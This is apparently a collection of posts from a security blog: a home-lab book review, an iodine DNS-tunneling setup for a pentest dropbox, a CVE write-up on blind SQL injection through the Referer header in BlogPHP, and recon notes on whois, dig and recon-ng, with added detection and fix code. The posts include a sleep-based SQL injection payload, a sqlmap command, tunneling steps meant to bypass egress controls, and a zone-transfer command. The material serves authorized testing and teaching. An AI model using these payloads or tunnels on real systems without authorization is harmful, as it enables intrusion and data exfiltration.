Book review – Building Virtual Machine Labs: A Hands-On Guide

AKA: How to break into IT/infosec

I’ve worked in IT for over a decade, and went through that struggle to break into an IT job, and later an infosec job. Everyone that is trying to break into IT or infosec knows the struggle of not being able to get the job because you don’t have experience and can’t get experience because you don’t have the job. There’s ONE reliable way to break through, and that’s to build a home lab and learn the skills on your own time. This allows you to be able to enthusiastically and truthfully answer interview questions, or show competence on the job.

Every interview I’ve done on either side of the table has included the question “tell me about your home lab”. If you’re lacking experience but you can enthusiastically tell me about how you’ve set up a virtual lab on your laptop or spare hardware, configured Active Directory, a virtual pfSense firewall, a SIEM, Apache/IIS, and hacked it and secured it, then you’ll win points during the interview.

Once you’ve broken into IT or infosec you can’t rest for long. It’s a lifelong learning process and if you don’t continue to learn and do in your personal lab then you’ll likely get left behind and become irrelevant. Yes, a home lab is a must even for seasoned professionals.

This is the book I wish I’d had many years ago when I was googling all of this info and learning it the hard way. The author does an outstanding job of explaining the underlying hardware and software needed for a virtual lab, and walking the reader through setting it all up step by step. There are multiple free hypervisor options to run your lab, and step by step instructions are included for each one.

The book starts out talking about prerequisite knowledge before moving into hardware considerations. Although you can build a lab on your laptop using free hypervisors, this section gets into hardware choices for professional labs as well as covering how to make the most of the hardware you have.

Next it moves into virtual networks, which can be confusing for newcomers trying to understand the difference between NAT, Bridged, and Host-Only adapters and when each choice makes sense to use in your lab. Virtual labs frequently run insecure software that you wouldn’t want to expose to the internet or an untrusted network, so you’ll need to understand how to use virtual switches and vNICs to segment your network.

The next section is a hypervisor guide and covers how to set up each, including VMware Fusion/ESXi/Workstation Pro, VirtualBox, and Hyper-V. Then the book gets into step by step instructions on configuring your virtual machines, including a pfSense firewall, Kali Linux, SIEM, IPS, and Metasploitable2. Once you have your lab configured, you’ll need to know how to manage the hosts. This is one of the areas where the book really goes above and beyond by explaining things like persistent static routes, generating ssh keys, helpful commands, and remote access, with guides for each OS. Every infosec interview I’ve been in has asked questions about SIEMs. The book covers how to install, configure, and manage the Splunk SIEM, which is one of the more popular SIEMs in use. The book ends on a more advanced note, covering malware analysis, pentesting, and IT/Ops lab configurations.

Every time someone has asked me how to break into IT or infosec I’ve always said that you need to get busy in your home lab to build your experience, knowing that building that lab is a pretty big challenge for newcomers. Now you have an excellent book that will hold your hand step by step through the process.

I don’t often buy books because I have a Safari Books Online membership and can read an unlimited number of books online on any device, but this book was well worth the cost and I learned a few things from it even after so many years in the game.

Building Virtual Machine Labs: A Hands-On Guide

Configure pentest dropbox DNS tunneling

I work for a very large corporation that has many subsidiaries and they are buying up smaller companies. We need to send out a dropbox (Raspberry Pi or Intel NUC) that we could have a remote office plug into the network for internal pentesting, and it establishes an ssh tunnel to our server regardless of network restrictions in the remote office.

Initially we used TAP from TrustedSec. TAP first tries to connect to a URL to retrieve a ‘commands.txt’ file that contains commands to run. If you don’t configure that, or if it fails to connect to your http/https/ftp server URL, TAP will fail over to ssh and establish an ssh tunnel. We sometimes experienced issues with the dropbox connecting out from networks that required a proxy server and denied ssh outbound.

My solution was to configure the dropbox to tunnel over DNS if the device is unable to establish a connection over TAP.

I’ll leave configuring TAP up to the reader as another pentester installed it and I installed iodine. The TAP github page setup instructions seem easy enough to understand.

Steps to reproduce DNS tunneling using iodine:

Configure DNS:
See the iodine setup guide: http://dev.kryo.se/iodine/wiki/HowtoSetup.
I thought I had missed something when it didn’t work the same day. After waiting for DNS changes to propagate I tried again the following day and it worked. The setup guide has a link to a tunnel tester in the Troubleshooting section.

Download iodine and install. Same steps on client and server:

git clone https://github.com/yarrick/iodine
cd iodine
make
sudo make install

Add iptables rules on your server to allow DNS connections.

sudo iptables -I INPUT 1 -p tcp --dport 53 -j ACCEPT
sudo iptables -I INPUT 2 -p udp --dport 53 -j ACCEPT

Run iodined on the server:

sudo ./iodined -f -c <tunnel IP address> <domain.name.com>

After entering your password for sudo, you’ll be prompted for a password for the tunnel connection. You can add the ‘-P <password>’ option on both client and server to script/automate the connection and avoid being prompted to enter one.
The ‘-f’ option was used to make it run in the foreground for troubleshooting and isn’t necessary once you have it working.
Note that the ‘-c’ option was critical to getting this to work.
The tunnel IP address is the local tunnel IP of your server. It isn’t the actual server IP address; it should be something that isn’t likely to be used on the LAN at either end. I used 10.0.0.1, and the dropbox client automatically received a tunnel IP address of 10.0.0.2 (netmask 255.255.255.224).

Run iodine on the client:

sudo iodine -f -r -P <password> <domain.name.com>

After sshing into the dropbox from my server over the DNS tunnel I was surprised to see that there wasn’t much lag and the connection was usable. I expected the connection to be much slower.

Configure the dropbox to check for a ssh connection over TAP after startup, and if none then start iodine to tunnel over DNS.

Edit: After posting a link to my article on Reddit and seeing some of the responses I realized that some don’t understand how DNS tunneling works and assume that if they block port 53 outbound and only allow network clients to use their internal DNS server then they are blocking DNS tunneling.

Here’s a good read to understand how DNS tunneling works and how to detect it. (I recommend Bro for DNS traffic analysis.) https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152

Two relevant sections of the paper that are critical to understanding how DNS tunneling works:

With this hierarchical system a given domain owner can define the authoritative servers for their domain. This means that they are in control of the ultimate destination host for DNS queries for their domain. In a typical enterprise, endpoints do not make DNS requests directly to the internet. They have internal DNS servers that provide DNS services to an endpoint. However, given that DNS will forward their requests until the authoritative name server is contacted, an attacker with access on an internal endpoint can leverage the enterprise’s DNS infrastructure for DNS tunneling to a domain that they control.

The last core technique is to encode data in DNS payloads. This is an area where the specifics of each utility vary widely. From a high level simplified point of view, the client wants to send data to the server. It will encode that data in the DNS payload. For example the client could send an ‘A’ record request where the data is encoded in the host name: MRZGS3TLEBWW64TFEBXXMYLMORUW4ZI.t.example.com. The server could respond with an answer as a CNAME response: NVWW2IDPOZQWY5DJNZSQ.t.example.com. In this way any data can be encoded and sent to the server. The server can also respond with any data. If there is a need for the server to initiate a communication, it cannot be done directly. Clients do not have a service listening for DNS requests and are typically behind a firewall. Server initiated communication can however be accomplished by having the client regularly poll the server. Then, if the server has data for the client it can send it as a response to the polling requests.
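As an added example (not from this post or the SANS paper), here is detection-side Python that decodes the paper’s two base32 sample labels and runs simple tunneling heuristics over a small constructed set of DNS query records, the kind of check you would run over Bro DNS logs for the tunnel the iodine steps above set up. The ‘ts client query qtype rcode’ record layout, the grouping by the parent zone of the leftmost label, the thresholds, and the sample data are all assumptions made for the example.

```python
"""Detection-side illustration of the DNS tunneling pattern described above.

Added example; not from the page or the SANS paper. It (1) decodes the paper's
base32 sample labels and (2) runs simple tunneling heuristics over a small,
constructed set of DNS query records.
"""
import base64
import math
from collections import defaultdict


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character. Encoded payload labels score high;
    human-chosen hostnames (www, mail, vpn) score low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_base32_label(label: str):
    """Decode one DNS label as unpadded RFC 4648 base32 (the encoding the
    paper's example uses). Returns bytes, or None if it is not valid base32."""
    padded = label.upper() + "=" * (-len(label) % 8)
    try:
        return base64.b32decode(padded)
    except (ValueError, TypeError):  # binascii.Error is a ValueError subclass
        return None


def parent_zone(qname: str) -> str:
    """Everything after the leftmost label: MRZ...ZI.t.example.com -> t.example.com.
    A real detector would use the public suffix list; this is a simplification."""
    return qname.split(".", 1)[1] if "." in qname else qname


def score_dns_queries(records, min_queries=5, min_avg_len=16.0,
                      min_entropy=3.0, min_unique_ratio=0.8):
    """Group queries by parent zone and flag zones whose leftmost labels look
    like encoded payload: many distinct, long, high-entropy prefixes."""
    zones = defaultdict(list)
    for r in records:
        zones[parent_zone(r["query"])].append(r["query"].split(".", 1)[0])
    report = {}
    for zone, prefixes in zones.items():
        n = len(prefixes)
        unique = len(set(prefixes))
        avg_len = sum(len(p) for p in prefixes) / n
        avg_ent = sum(shannon_entropy(p) for p in prefixes) / n
        report[zone] = {
            "queries": n,
            "unique_prefixes": unique,
            "avg_prefix_len": round(avg_len, 2),
            "avg_entropy": round(avg_ent, 2),
            "suspicious": (n >= min_queries and unique / n >= min_unique_ratio
                           and avg_len >= min_avg_len and avg_ent >= min_entropy),
        }
    return report


def parse_dns_log(text: str):
    """Parse 'ts client query qtype rcode' lines. This is a constructed layout
    loosely modelled on Bro's dns.log columns, not Bro's real schema."""
    records = []
    for line in text.strip().splitlines():
        ts, client, query, qtype, rcode = line.split()
        records.append({"ts": float(ts), "client": client,
                        "query": query.rstrip("."), "qtype": qtype, "rcode": rcode})
    return records


# Constructed sample: six tunnel-style queries carrying base32 chunks of a
# made-up payload to t.example.com, mixed with ordinary lookups.
_PAYLOAD_CHUNKS = [b"chunk %d of a constructed payload" % i for i in range(6)]
_TUNNEL_LABELS = [base64.b32encode(c).decode().rstrip("=") for c in _PAYLOAD_CHUNKS]
SAMPLE_DNS_LOG = "\n".join(
    ["1477670000.1 10.1.2.3 www.example.com A NOERROR",
     "1477670000.2 10.1.2.3 mail.example.com MX NOERROR",
     "1477670000.3 10.1.2.4 vpn.example.com A NOERROR",
     "1477670000.4 10.1.2.4 update.example.com A NOERROR",
     "1477670000.5 10.1.2.4 static.example.com A NOERROR"]
    + ["1477670001.%d 10.1.2.9 %s.t.example.com TXT NOERROR" % (i, lbl)
       for i, lbl in enumerate(_TUNNEL_LABELS)]
)


def suspicious_zones(log_text: str = SAMPLE_DNS_LOG):
    """Return the sorted list of parent zones flagged by the heuristics."""
    report = score_dns_queries(parse_dns_log(log_text))
    return sorted(z for z, v in report.items() if v["suspicious"])


if __name__ == "__main__":
    for lbl in ("MRZGS3TLEBWW64TFEBXXMYLMORUW4ZI", "NVWW2IDPOZQWY5DJNZSQ"):
        print(lbl, "->", decode_base32_label(lbl))
    for zone, stats in score_dns_queries(parse_dns_log(SAMPLE_DNS_LOG)).items():
        print(zone, stats)
```

Blocking port 53 outbound does nothing against this pattern because the internal resolver forwards the queries on the client’s behalf; the place to look is the resolver’s query log, which is what the heuristics above consume.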

My first CVE-2016-1000329 in BlogPHP

While the affected software, BlogPHP, isn’t in widespread use (at least I hope not!) and it’s outdated and abandoned by the developer, this find means a lot to me because it’s my first CVE. This vulnerability has also been overlooked by many people for years, including those that worked on the Breach 2.1 vulnhub challenge. Breach 2.1 is a boot2root/CTF challenge which attempts to showcase a real-world scenario penetration test. My full write-up of my pentest of Breach can be found here.

I used an XSS exploit to steal the admin’s cookie which should have allowed me to login as admin but it didn’t work. Knowing that the admin user was logging in to a blog hosted on the same host I decided to take a look at the HTTP headers to see if I needed to change something in the “Referer” field in order for the stolen cookie to allow me to login as admin. I initially tried changing it to localhost and 127.0.0.1 with no success.

While fuzzing the HTTP header “Referer” field I discovered a blind SQL injection. Using an input of ‘+(select*from(select(sleep(20)))a)+’ including single quotes results in a delay of 20 seconds to page render. I was able to further exploit the vulnerability using sqlmap. I saved the request from Burp Suite to a text file and exploited it with sqlmap using “sqlmap -r req.txt --level=5 --risk=3”.
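Added illustration of the bug class and its fix (hypothetical Python/SQLite code, not BlogPHP’s): the Referer header interpolated into an INSERT versus bound as a parameter, exercised with the payload quoted above. SQLite has no sleep() function, so the payload cannot delay anything here; what it shows is whether the header reaches the SQL parser (vulnerable) or is stored verbatim as data (fixed).

```python
"""Hypothetical visitor-log code illustrating the Referer SQL injection class
described above and its fix. Not BlogPHP's code; in-memory SQLite stands in
for the blog's database."""
import sqlite3

# The payload quoted on the page, including its single quotes.
PAGE_PAYLOAD = "'+(select*from(select(sleep(20)))a)+'"


def _fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, referer TEXT)")
    return db


def log_visit_vulnerable(db, referer: str) -> bool:
    """Header interpolated into the statement, so attacker text becomes SQL.
    Returns True if the insert ran, False if the SQL parser rejected the
    resulting statement (on MySQL the page's payload would instead sleep)."""
    try:
        db.execute("INSERT INTO visits (referer) VALUES ('%s')" % referer)
        return True
    except sqlite3.Error:
        return False


def log_visit_fixed(db, referer: str) -> bool:
    """Parameterised statement: the header is bound as data, never parsed as SQL."""
    db.execute("INSERT INTO visits (referer) VALUES (?)", (referer,))
    return True


def stored_referers(db):
    """Rows as the application would later read them back."""
    return [row[0] for row in db.execute("SELECT referer FROM visits ORDER BY id")]


def demo():
    """Run both versions against a benign header and the page's payload."""
    results = {}
    for name, fn in (("vulnerable", log_visit_vulnerable), ("fixed", log_visit_fixed)):
        db = _fresh_db()
        results[name] = {
            "benign_ok": fn(db, "http://localhost/blog/"),
            "payload_ok": fn(db, PAGE_PAYLOAD),
            "rows": stored_referers(db),
        }
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```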

I submitted my CVE request through Mitre who notified me that “The Distributed Weakness Filing (DWF) Project is the CVE Numbering Authority (CNA) currently responsible for assigning CVE IDs to open source software vulnerabilities that are outside of the current CVE coverage goals listed at http://cve.mitre.org/cve/data_sources_product_coverage.html.”

CVE listing for CVE-2016-1000329 on DWF.

Passive Information Gathering

I prepared this presentation for the 757 White Hat Hackers meeting on 10/26 where I presented on Passive Information Gathering. Passive Information Gathering is simply reconnaissance methods that don’t touch the target or leave any traces of your presence.

Topics:

  • Whois
  • Dig
  • Recon-ng
  • Theharvester
  • Network-tools.com
  • Netcraft Toolbar
  • SiteDigger
  • Shodan
  • Maltego

Whois

Whois is usually installed on Linux systems and returns the following domain information:

Registrar: The company/organization that registered the domain on behalf of the domain’s owner.
Name Servers: The servers that control the domain’s DNS.
Creation Date: The date the domain was originally registered.
Expiration Date: When the domain will expire.
Contacts: Publicly accessible information, required by registrars

Usage: “whois <domainName>”

root@DESKTOP-7ETQJM7:~# whois nasa.gov
% DOTGOV WHOIS Server ready
 Domain Name: NASA.GOV
 Status: ACTIVE

>>> Last update of whois database: 2016-10-28T17:55:42Z <<<
Please be advised that this whois server only contains information pertaining
to the .GOV domain. For information for other domains please use the whois
server at RS.INTERNIC.NET.
root@DESKTOP-7ETQJM7:~# whois yahoo.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

 Domain Name: YAHOO.COM
 Registrar: MARKMONITOR INC.
 Sponsoring Registrar IANA ID: 292
 Whois Server: whois.markmonitor.com
 Referral URL: http://www.markmonitor.com
 Name Server: NS1.YAHOO.COM
 Name Server: NS2.YAHOO.COM
 Name Server: NS3.YAHOO.COM
 Name Server: NS4.YAHOO.COM
 Name Server: NS5.YAHOO.COM
 Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
 Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
 Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
 Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
 Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
 Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
 Updated Date: 26-aug-2015
 Creation Date: 18-jan-1995
 Expiration Date: 19-jan-2023

>>> Last update of whois database: Fri, 28 Oct 2016 17:56:10 GMT <<<
Domain Name: yahoo.com
Registry Domain ID: 3643624_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2015-08-26T15:30:44-0700
Creation Date: 1995-01-18T00:00:00-0800
Registrar Registration Expiration Date: 2023-01-18T21:00:00-0800
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895740
Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)
Domain Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)
Domain Status: serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)
Domain Status: serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)
Registry Registrant ID:
Registrant Name: Domain Administrator
Registrant Organization: Yahoo! Inc.
Registrant Street: 701 First Avenue
Registrant City: Sunnyvale
Registrant State/Province: CA
Registrant Postal Code: 94089
Registrant Country: US
Registrant Phone: +1.4083493300
Registrant Phone Ext:
Registrant Fax: +1.4083493301
Registrant Fax Ext:
Registrant Email: domainadmin@yahoo-inc.com
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: Yahoo! Inc.
Admin Street: 701 First Avenue
Admin City: Sunnyvale
Admin State/Province: CA
Admin Postal Code: 94089
Admin Country: US
Admin Phone: +1.4083493300
Admin Phone Ext:
Admin Fax: +1.4083493301
Admin Fax Ext:
Admin Email: domainadmin@yahoo-inc.com
Registry Tech ID:
Tech Name: Domain Administrator
Tech Organization: Yahoo! Inc.
Tech Street: 701 First Avenue
Tech City: Sunnyvale
Tech State/Province: CA
Tech Postal Code: 94089
Tech Country: US
Tech Phone: +1.4083493300
Tech Phone Ext:
Tech Fax: +1.4083493301
Tech Fax Ext:
Tech Email: domainadmin@yahoo-inc.com
Name Server: ns4.yahoo.com
Name Server: ns2.yahoo.com
Name Server: ns1.yahoo.com
Name Server: ns5.yahoo.com
Name Server: ns3.yahoo.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2016-10-28T10:52:20-0700 <<<

Dig

Domain Internet Groper

Options:

root@DESKTOP-7ETQJM7:~# dig -h
Usage: dig [@global-server] [domain] [q-type] [q-class] {q-opt}
 {global-d-opt} host [@local-server] {local-d-opt}
 [ host [@local-server] {local-d-opt} [...]]
Where: domain is in the Domain Name System
 q-class is one of (in,hs,ch,...) [default: in]
 q-type is one of (a,any,mx,ns,soa,hinfo,axfr,txt,...) [default:a]
 (Use ixfr=version for type ixfr)
 q-opt is one of:
 -x dot-notation (shortcut for reverse lookups)
 -i (use IP6.INT for IPv6 reverse lookups)
 -f filename (batch mode)
 -b address[#port] (bind to source address/port)
 -p port (specify port number)
 -q name (specify query name)
 -t type (specify query type)
 -c class (specify query class)
 -k keyfile (specify tsig key file)
 -y [hmac:]name:key (specify named base64 tsig key)
 -4 (use IPv4 query transport only)
 -6 (use IPv6 query transport only)
 -m (enable memory usage debugging)
 d-opt is of the form +keyword[=value], where keyword is:
 +[no]vc (TCP mode)
 +[no]tcp (TCP mode, alternate syntax)
 +time=### (Set query timeout) [5]
 +tries=### (Set number of UDP attempts) [3]
 +retry=### (Set number of UDP retries) [2]
 +domain=### (Set default domainname)
 +bufsize=### (Set EDNS0 Max UDP packet size)
 +ndots=### (Set NDOTS value)
 +[no]edns[=###] (Set EDNS version) [0]
 +[no]search (Set whether to use searchlist)
 +[no]showsearch (Search with intermediate results)
 +[no]defname (Ditto)
 +[no]recurse (Recursive mode)
 +[no]ignore (Don't revert to TCP for TC responses.)
 +[no]fail (Don't try next server on SERVFAIL)
 +[no]besteffort (Try to parse even illegal messages)
 +[no]aaonly (Set AA flag in query (+[no]aaflag))
 +[no]adflag (Set AD flag in query)
 +[no]cdflag (Set CD flag in query)
 +[no]cl (Control display of class in records)
 +[no]cmd (Control display of command line)
 +[no]comments (Control display of comment lines)
 +[no]rrcomments (Control display of per-record comments)
 +[no]question (Control display of question)
 +[no]answer (Control display of answer)
 +[no]authority (Control display of authority)
 +[no]additional (Control display of additional)
 +[no]stats (Control display of statistics)
 +[no]short (Disable everything except short
 form of answer)
 +[no]ttlid (Control display of ttls in records)
 +[no]all (Set or clear all display flags)
 +[no]qr (Print question before sending)
 +[no]nssearch (Search all authoritative nameservers)
 +[no]identify (ID responders in short answers)
 +[no]trace (Trace delegation down from root [+dnssec])
 +[no]dnssec (Request DNSSEC records)
 +[no]nsid (Request Name Server ID)
 +[no]sigchase (Chase DNSSEC signatures)
 +trusted-key=#### (Trusted Key when chasing DNSSEC sigs)
 +[no]topdown (Do DNSSEC validation top down mode)
 +[no]split=## (Split hex/base64 fields into chunks)
 +[no]multiline (Print records in an expanded format)
 +[no]onesoa (AXFR prints only one soa record)
 +[no]keepopen (Keep the TCP socket open between queries)
 global d-opts and servers (before host name) affect all queries.
 local d-opts and servers (after host name) affect only that lookup.
 -h (print help and exit)
 -v (print version and exit)

My favorite dig option is axfr, for a zone transfer. Zone transfers are a DNS transaction used to replicate records between DNS servers. It’s rare to find a DNS server these days that allows a zone transfer, but it’s something you should check. If you succeed in performing a zone transfer, you will have all DNS records for a domain.

Example: dig axfr @dns-server domain.name

Recon-ng

https://bitbucket.org/LaNMaSteR53/recon-ng

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Usage Guide for more information.
Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for more information.

If you know how to use Metasploit, you should feel right at home using recon-ng. You can even automate recon-ng using resource files like you can with Metasploit.

Some of the modules are passive and never touch the target network, while others directly probe and can even attack the system you are targeting.

To install recon-ng in Kali, enter the command:

apt-get update && apt-get install recon-ng

At each level in recon-ng you can get help by typing the help and show commands.

[recon-ng][default] > help

Commands (type [help|?] <topic>):
---------------------------------
add Adds records to the database
back Exits the current context
delete Deletes records from the database
exit Exits the framework
help Displays this menu
keys Manages framework API keys
load Loads specified module
pdb Starts a Python Debugger session
query Queries the database
record Records commands to a resource file
reload Reloads all modules
resource Executes commands from a resource file
search Searches available modules
set Sets module options
shell Executes shell commands
show Shows various framework items
snapshots Manages workspace snapshots
spool Spools output to a file
unset Unsets module options
use Loads specified module
workspaces Manages workspaces

[recon-ng][default] > show
Shows various framework items

Usage: show [banner|companies|contacts|credentials|dashboard|domains|hosts|keys|leaks|locations|modules|netblocks|options|ports|profiles|pushpins|repositories|schema|vulnerabilities|workspaces]

Recon-ng uses the concept of workspaces to organize targets. To add a workspace, use “workspaces add <workspaceName>”. The prompt will change from “default” to display the current workspace.

[recon-ng][default] > workspaces add demo

In the new workspace, add a company and domain:

[recon-ng][demo] > add companies
company (TEXT): SANS
description (TEXT): SANS
[recon-ng][demo] > add domains
domain (TEXT): sans.org

Full list of modules:

[recon-ng][default] > show modules

 Discovery
 ---------
 discovery/info_disclosure/cache_snoop
 discovery/info_disclosure/interesting_files

 Exploitation
 ------------
 exploitation/injection/command_injector
 exploitation/injection/xpath_bruter

 Import
 ------
 import/csv_file
 import/list

 Recon
 -----
 recon/companies-contacts/bing_linkedin_cache
 recon/companies-contacts/indeed
 recon/companies-contacts/jigsaw/point_usage
 recon/companies-contacts/jigsaw/purchase_contact
 recon/companies-contacts/jigsaw/search_contacts
 recon/companies-contacts/linkedin_auth
 recon/companies-multi/github_miner
 recon/companies-multi/whois_miner
 recon/contacts-contacts/mailtester
 recon/contacts-contacts/mangle
 recon/contacts-contacts/unmangle
 recon/contacts-credentials/hibp_breach
 recon/contacts-credentials/hibp_paste
 recon/contacts-domains/migrate_contacts
 recon/contacts-profiles/fullcontact
 recon/credentials-credentials/adobe
 recon/credentials-credentials/bozocrack
 recon/credentials-credentials/hashes_org
 recon/domains-contacts/metacrawler
 recon/domains-contacts/pgp_search
 recon/domains-contacts/whois_pocs
 recon/domains-credentials/pwnedlist/account_creds
 recon/domains-credentials/pwnedlist/api_usage
 recon/domains-credentials/pwnedlist/domain_creds
 recon/domains-credentials/pwnedlist/domain_ispwned
 recon/domains-credentials/pwnedlist/leak_lookup
 recon/domains-credentials/pwnedlist/leaks_dump
 recon/domains-domains/brute_suffix
 recon/domains-hosts/bing_domain_api
 recon/domains-hosts/bing_domain_web
 recon/domains-hosts/brute_hosts
 recon/domains-hosts/builtwith
 recon/domains-hosts/certificate_transparency
 recon/domains-hosts/google_site_api
 recon/domains-hosts/google_site_web
 recon/domains-hosts/hackertarget
 recon/domains-hosts/netcraft
 recon/domains-hosts/shodan_hostname
 recon/domains-hosts/ssl_san
 recon/domains-hosts/threatcrowd
 recon/domains-hosts/vpnhunter
 recon/domains-vulnerabilities/ghdb
 recon/domains-vulnerabilities/punkspider
 recon/domains-vulnerabilities/xssed
 recon/domains-vulnerabilities/xssposed
 recon/hosts-domains/migrate_hosts
 recon/hosts-hosts/bing_ip
 recon/hosts-hosts/freegeoip
 recon/hosts-hosts/ipinfodb
 recon/hosts-hosts/resolve
 recon/hosts-hosts/reverse_resolve
 recon/hosts-hosts/ssltools
 recon/hosts-locations/migrate_hosts
 recon/hosts-ports/shodan_ip
 recon/locations-locations/geocode
 recon/locations-locations/reverse_geocode
 recon/locations-pushpins/flickr
 recon/locations-pushpins/instagram
 recon/locations-pushpins/picasa
 recon/locations-pushpins/shodan
 recon/locations-pushpins/twitter
 recon/locations-pushpins/youtube
 recon/netblocks-companies/whois_orgs
 recon/netblocks-hosts/reverse_resolve
 recon/netblocks-hosts/shodan_net
 recon/netblocks-ports/census_2012
 recon/netblocks-ports/censysio
 recon/ports-hosts/migrate_ports
 recon/profiles-contacts/dev_diver
 recon/profiles-contacts/github_users
 recon/profiles-profiles/namechk
 recon/profiles-profiles/profiler
 recon/profiles-profiles/twitter_mentioned
 recon/profiles-profiles/twitter_mentions
 recon/profiles-repositories/github_repos
 recon/repositories-profiles/github_commits
 recon/repositories-vulnerabilities/gists_search
 recon/repositories-vulnerabilities/github_dorks

 Reporting
 ---------
 reporting/csv
 reporting/html
 reporting/json
 reporting/list
 reporting/pushpin
 reporting/xlsx
 reporting/xml

Striker Security has published an excellent guide to recon-ng modules. Get it here: https://strikersecurity.com/pdfs/recon-ng-guide.pdf

Instead of viewing the full list of modules, you can search for them.

[recon-ng][demo] > search domains
[*] Searching for 'domains'...

 Recon
 -----
 recon/contacts-domains/migrate_contacts
 recon/domains-contacts/metacrawler
 recon/domains-contacts/pgp_search
 recon/domains-contacts/whois_pocs
 recon/domains-credentials/pwnedlist/account_creds
 recon/domains-credentials/pwnedlist/api_usage
 recon/domains-credentials/pwnedlist/domain_creds
 recon/domains-credentials/pwnedlist/domain_ispwned
 recon/domains-credentials/pwnedlist/leak_lookup
 recon/domains-credentials/pwnedlist/leaks_dump
 recon/domains-domains/brute_suffix
 recon/domains-hosts/bing_domain_api
 recon/domains-hosts/bing_domain_web
 recon/domains-hosts/brute_hosts
 recon/domains-hosts/builtwith
 recon/domains-hosts/certificate_transparency
 recon/domains-hosts/google_site_api
 recon/domains-hosts/google_site_web
 recon/domains-hosts/hackertarget
 recon/domains-hosts/netcraft
 recon/domains-hosts/shodan_hostname
 recon/domains-hosts/ssl_san
 recon/domains-hosts/threatcrowd
 recon/domains-hosts/vpnhunter
 recon/domains-vulnerabilities/ghdb
 recon/domains-vulnerabilities/punkspider
 recon/domains-vulnerabilities/xssed
 recon/domains-vulnerabilities/xssposed
 recon/hosts-domains/migrate_hosts

To use a module, enter “use <full path to module>”. Recon-ng offers tab completion, so you can type a partial path and hit the tab key to complete each section of the path between slashes. Once you’ve entered a module, use “show info” to find module info and required parameters.

[recon-ng][demo][shodan_hostname] > use recon/domains-hosts/bing_domain_web
[recon-ng][demo][bing_domain_web] > show info

 Name: Bing Hostname Enumerator
 Path: modules/recon/domains-hosts/bing_domain_web.py
 Author: Tim Tomes (@LaNMaSteR53)

Description:
 Harvests hosts from Bing.com by using the 'site' search operator. Updates the 'hosts' table with the
 results.

Options:
  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       source of input (see 'show info' for details)

Source Options:
  default      SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL
  <string>     string representing a single input
  <path>       path to a file containing a list of inputs
  query <sql>  database query returning one column of inputs

[recon-ng][demo][bing_domain_web] >

To start the module, enter “run”.

[recon-ng][demo][bing_domain_web] > run

--------
SANS.ORG
--------
[*] URL: https://www.bing.com/search?first=0&q=domain%3Asans.org
[*] [host] files.sans.org (<blank>)
[*] [host] labs.sans.org (<blank>)
[*] [host] www.sans.org (<blank>)
[*] [host] cyber-defense.sans.org (<blank>)
[*] [host] redmine.sans.org (<blank>)
[*] [host] securingthehuman.sans.org (<blank>)
[*] [host] software-security.sans.org (<blank>)
[*] [host] lists.sans.org (<blank>)
[*] [host] access.sans.org (<blank>)
[*] [host] digital-forensics.sans.org (<blank>)
[*] [host] sic.sans.org (<blank>)
[*] [host] uk.sans.org (<blank>)
[*] [host] ics.sans.org (<blank>)
[*] [host] pen-testing.sans.org (<blank>)
[*] [host] qms.sans.org (<blank>)
[*] [host] handlers.sans.org (<blank>)
[*] Sleeping to avoid lockout...

Now lets check out any new hosts added to the database.

[recon-ng][demo][bing_domain_web] > show hosts

 +---------------------------------------------------------------------------------------------------------------+
 | rowid | host | ip_address | region | country | latitude | longitude | module |
 +---------------------------------------------------------------------------------------------------------------+
 | 1 | files.sans.org | | | | | | bing_domain_web |
 | 2 | labs.sans.org | | | | | | bing_domain_web |
 | 3 | www.sans.org | | | | | | bing_domain_web |
 | 4 | cyber-defense.sans.org | | | | | | bing_domain_web |
 | 5 | redmine.sans.org | | | | | | bing_domain_web |
 | 6 | securingthehuman.sans.org | | | | | | bing_domain_web |
 | 7 | software-security.sans.org | | | | | | bing_domain_web |
 | 8 | lists.sans.org | | | | | | bing_domain_web |

(cropped for brevity)

